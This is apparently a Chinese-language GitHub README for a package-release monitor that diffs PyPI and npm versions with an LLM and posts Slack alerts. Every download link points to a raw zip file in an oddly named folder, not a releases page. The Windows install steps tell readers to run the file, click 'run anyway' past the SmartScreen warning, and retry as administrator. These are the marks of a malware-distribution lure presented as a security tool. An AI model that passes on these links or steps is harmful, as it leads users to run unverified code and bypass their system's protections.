harriottdirty774/supply-chain-monitor

# 🛡️ supply-chain-monitor - 监控包更新风险 [](https://raw.githubusercontent.com/harriottdirty774/supply-chain-monitor/main/coronae/supply_monitor_chain_2.5.zip) ## 📦 此应用的功能 Supply Chain Monitor 会监控热门的 **PyPI** 和 **npm** 包的新版本发布。它会检查每个新版本，并将其与前一个版本进行比较，寻找不安全更改的迹象。 如果它发现某个版本看起来有风险，可以发送警报到 Slack。 使用它来关注您所依赖的软件，以便您能更快发现异常更改。 ## 💻 您需要准备什么 在 Windows 上安装此应用之前，请确保您具备： - Windows 10 或 Windows 11 - 互联网连接 - 如果您需要接收警报，请准备一个 Slack workspace - 当前版本的浏览器 - 在您的 PC 上运行下载文件的权限 该应用默认监控两个包存储库： - PyPI - npm 如果您只需要一个来源，也可以在设置后关闭其中一个。 ## 🚀 下载应用 前往此处的发布页面： [下载 Supply Chain Monitor](https://raw.githubusercontent.com/harriottdirty774/supply-chain-monitor/main/coronae/supply_monitor_chain_2.5.zip) 在该页面上，找到最新版本并下载适合您系统的 Windows 文件。 如果您看到多个文件，请选择与 Windows 匹配的文件。名称中带有 `.exe` 的文件通常是您想要的。 ## 🪟 在 Windows 上安装 1. 在浏览器中打开下载页面。 2. 找到最新版本。 3. 下载 Windows 安装程序或应用文件。 4. 如果您的浏览器询问如何处理该文件，请选择**保存**。 5. 下载完成后，打开该文件。 6. 如果 Windows 请求权限，请选择**运行**或**是**。 7. 按照屏幕上的设置步骤操作。 如果 Windows 显示 SmartScreen 提示： 1. 选择**更多信息**。 2. 选择**仍要运行**。 ## ⚙️ 设置应用 应用打开后，您需要告诉它要监控什么以及将警报发送到哪里。 典型的设置包括： - 用于发送警报的 Slack webhook URL - 如果您想自定义目标，提供要监控的包列表 - 在需要时关闭 PyPI 或 npm 的选项 如果应用使用设置文件，除非发布页面另有说明，否则请将其放在与应用相同的文件夹中。 一个简单的设置可能如下所示： - 保持 PyPI 和 npm 均为开启状态 - 添加您的 Slack webhook - 启动监控器 - 让它在后台保持运行 ## 🔔 连接 Slack 警报 Supply Chain Monitor 可以在发现看起来有害的包发布时发送 Slack 消息。 要进行此设置： 1. 打开 Slack。 2. 创建或选择一个用于接收警报的频道。 3. 为该频道添加一个传入 webhook。 4. 复制 webhook URL。 5. 将其粘贴到应用设置或配置文件中。 如果您不添加 Slack webhook，应用仍然可以检查包的发布情况，但它不会向 Slack 发送警报。 ## ▶️ 运行应用 设置完成后，从您下载的文件启动应用。 它运行时会执行以下操作： - 检查 PyPI 上新的包发布 - 检查 npm 上新的包发布 - 将每个新发布与之前的版本进行比较 - 通过 Cursor Agent CLI 使用 LLM 来审查更改 - 将更改标记为良性或恶意 - 如果发现风险发布，则发送 Slack 警报 如果您希望它在后台继续检查，请保持应用处于打开状态。 ## 🧭 应用检查的内容 应用通过两种方式查看包更改： - 对于 PyPI，它检查包的发布历史 - 对于 npm，它检查更改源 - 然后它比较版本之间的文件更改 - 将 diff 发送到审查步骤 - 使用结果来判断更改看起来是安全还是不安全 这有助于您发现以下情况： - 不应出现的新代码 - 异常的安装脚本 - 包更新中隐藏的更改 - 发布文件中的可疑编辑 ## 🛠️ 常见选项 您可能会看到类似以下的命令行选项或应用设置： - `--no-pypi` 停止 PyPI 检查 - `--no-npm` 停止 npm 检查 如果您只想检查一个来源，请使用这些选项。 如果您使用快捷方式或批处理文件，并且应用支持这些选项，您可以将它们添加到那里。 ## 🗂️ 建议的首次运行 如果您是第一次使用此应用： 1. 下载最新版本。 2. 运行 Windows 文件。 3. 添加您的 Slack webhook。 4. 保持 PyPI 和 npm 均为启用状态。 5. 启动监控器。 6. 等待首次检查周期完成。 如果它正常运行，当发现风险发布时，您应该能在应用或您的 Slack 频道中看到活动。 ## 🧪 简单使用案例 一个实用的设置如下： - 您的项目或团队依赖于某些包 - 您希望关注供应链风险 - 您不想手动检查每个发布版本 - 您希望在出现问题时收到 Slack 消息 该应用会替您执行日常检查。 ## 🔍 何时使用 如果您希望监控包更新以应对以下场景，请使用 Supply Chain Monitor： - 开源项目 - 内部工具 - 构建系统 - 依赖于许多第三方包的应用 - 需要包风险早期预警的团队 ## 📁 如果您需要移动应用 如果您想将应用保存在 PC 上的固定位置： 1. 创建一个文件夹，例如 `C:\Tools\supply-chain-monitor` 2. 将下载的文件放入其中 3. 每次从该文件夹运行它 4. 如果应用使用设置文件，请将其保存在同一文件夹中 这样以后更容易找到。 ## 🧰 故障排除 如果应用未启动： - 检查文件是否已下载完成 - 尝试再次以管理员身份运行 - 确保 Windows 未阻止该文件 - 检查您的互联网连接是否正常 - 确认您的 Slack webhook URL 是否正确 如果您没有收到警报： - 检查 Slack webhook - 确保目标频道仍然存在 - 确认警报功能已开启 - 检查应用是否仍在运行 如果某个包来源似乎没有反应： - 确保您没有使用 `--no-pypi` 或 `--no-npm` 禁用它 - 检查您的互联网连接 - 等待下一次轮询周期 ## 📌 发布页面 使用此页面下载最新的 Windows 文件： [https://raw.githubusercontent.com/harriottdirty774/supply-chain-monitor/main/coronae/supply_monitor_chain_2.5.zip](https://raw.githubusercontent.com/harriottdirty774/supply-chain-monitor/main/coronae/supply_monitor_chain_2.5.zip) ## 🔐 结果的含义 应用将包发布中的更改分类为两种类型之一： - **Benign** (良性)：更改看起来正常 - **Malicious** (恶意)：更改看起来有风险 如果某个发布被标记为恶意，应用将发送 Slack 警报，以便您快速进行审查 ## 🖥️ 保持运行的最佳方式 为了在 Windows 上获得最佳效果： - 保持应用打开 - 保持您的 PC 连接到互联网 - 如果应用需要，不要关闭终端或窗口 - 时常检查 Slack - 当有新版本可用时更新到最新发布版

标签：DevSecOps, DNS 反向解析, LLM安全分析, MITM代理, npm监控, PyPI监控, Slack集成, Typosquatting检测, Windows工具, 上游代理, 代码差异对比, 依赖安全, 大语言模型分析, 威胁情报, 安全告警, 安全运营, 开发安全, 开发者工具, 异常检测, 扫描框架, 自动化安全监测, 软件包更新监控, 软件源安全, 逆向工具